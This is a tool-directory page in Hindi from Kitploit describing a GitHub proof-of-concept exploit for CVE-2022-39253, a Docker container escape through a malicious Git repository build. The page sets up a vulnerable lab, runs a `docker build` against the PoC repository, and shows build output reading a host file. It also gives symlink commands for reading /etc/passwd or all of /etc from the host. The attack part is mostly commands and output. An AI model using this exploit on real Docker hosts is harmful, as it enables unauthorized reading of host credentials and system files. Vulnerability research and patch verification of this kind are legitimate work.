Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/ssst0n3/docker-cve-2022-39253-poc
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब सुरक्षाकंटेनर एस्केप
GitHubssst0n3/docker-cve-2022-39253-poc

docker-cve-2022-39253-poc

CVE-2022-39253 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो दुर्भावनापूर्ण Git रिपॉजिटरी बिल्ड के माध्यम से Docker कंटेनर एस्केप का प्रदर्शन करता है, जिससे होस्ट फ़ाइल सिस्टम की पढ़ने की पहुंच सक्षम होती है।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
10531 साल पहलेअभी तक समीक्षित नहीं

डॉकर होस्ट फ़ाइल पढ़ना (cve-2022-39253 का उपयोग करके) पीओसी

PoC

पर्यावरण पुन: उत्पन्न करें
root@kitploit:~
$ docker run --name=cve-2022-39253 -ti -d ssst0n3/docker_archive:git_cve-2022-39253
$ docker attach --detach-keys ctrl-x cve-2022-39253
# (use ctrl-x to exit container's terminal)
# (wait minutes for environment starting ...)
...
Ubuntu 22.04 LTS ubuntu ttyS0

ubuntu login: root
Password: root

root@ubuntu:~# apt list --installed |grep "git/now"

WARNING: apt does not have a stable CLI interface. Use with caution in scripts.

git/now 1:2.34.1-1ubuntu1.2 amd64 [installed,upgradable to: 1:2.34.1-1ubuntu1.6]

root@ubuntu:~# docker --version
Docker version 20.10.19, build d85ef84
root@kitploit:~
echo "*************escaped*************" > /tmp/escaped
docker build https://github.com/ssst0n3/docker-cve-2022-39253-poc.git#main
root@kitploit:~
Sending build context to Docker daemon    234kB
Step 1/4 : FROM busybox
latest: Pulling from library/busybox
45a0cdc5c8d3: Pull complete 
Digest: sha256:3b3128d9df6bbbcc92e2358e596c9fbd722a437a62bafbc51607970e9e3b8869
Status: Downloaded newer image for busybox:latest
 ---> 334e4a014c81
Step 2/4 : COPY / /
 ---> 9f2e7d6efffd
Step 3/4 : RUN ls -lah /.git/modules/evil/objects/host
 ---> Running in e21e9a9c8294
-rw-r--r--    1 root     root           8 Dec 21 02:26 /.git/modules/evil/objects/host
Removing intermediate container e21e9a9c8294
 ---> c87453ca2a37
Step 4/4 : RUN cat /.git/modules/evil/objects/host
 ---> Running in a0463dca30b7
*************escaped*************
Removing intermediate container a0463dca30b7
 ---> 2330735e84e4
Successfully built 2330735e84e4

अन्य फ़ाइल या निर्देशिका कैसे पढ़ें

root@kitploit:~
ln -s /etc/passwd evil2/git/objects/host

या

root@kitploit:~
ln -s /etc evil2/git/objects/host

आप रूट निर्देशिका / भी पढ़ सकते हैं।

सुरक्षा सलाहकार

  • https://github.com/moby/moby/security/advisories/GHSA-vp35-85q5-9f25
  • https://github.com/git/git/security/advisories/GHSA-3wp6-j8xr-qw85
टूल डाउनलोड करें